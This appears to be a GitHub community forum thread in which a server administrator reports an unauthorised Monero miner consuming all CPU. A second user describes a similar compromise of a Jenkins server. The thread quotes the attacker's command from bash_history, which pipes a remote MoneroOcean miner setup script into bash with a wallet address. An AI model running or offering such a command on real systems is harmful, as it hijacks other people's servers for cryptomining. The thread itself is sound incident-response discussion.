### DISCUSSION TITLE
Monero Miner Suddenly Running and using server resources

### DISCUSSION THREAD

**Discussion by nyelnizy** [community/community#77411] [Other Feature Feedback, Questions, & Ideas]
### Select Topic Area

General

### Body

Hello, this is not necessarily an issue but I am not sure where to post it.

So we realized a high cpu(100%) usage on our server 3 days ago and realized the Monero Miner was the process consuming the resources.
We have nothing to do with Monero and so we found it suspicious to see a process we never installed running and using up our resources.
The process was running under a specific user account and so we reviewed the bash_history and noticed a curl command that downloads a script from the repository https://github.com/MoneroOcean/xmrig_setup.

This is the cur command:
curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 41qbTDmsb6s4RiWgju3kSSNStWYY7mfyoepx4sFmw5um68MxJtnzQQw31bN1Y9hjp4jYwg2WTpeUfaGT375rNvyX4VGNw8Q

We have confirmed no one from our team executed that command and so we suspect the user account that was used to run the command has been compromised.
Does anyone have an Idea what could be going on here?
Thanks.

**Comment by gurneesh9** [comment]
Hi, 
Found something similar running on my jenkins server which was compromised, someone was running Monero miner on it. The script setup_moneroocean_miner.sh is downloaded using curl and run on server. The string after bash -s is probably the wallet address, looking I the script as the first argument that is sent is saved in variable named WALLET. In home directory of user which was running this script you'll find directory named "moneroocean" that contains more information.
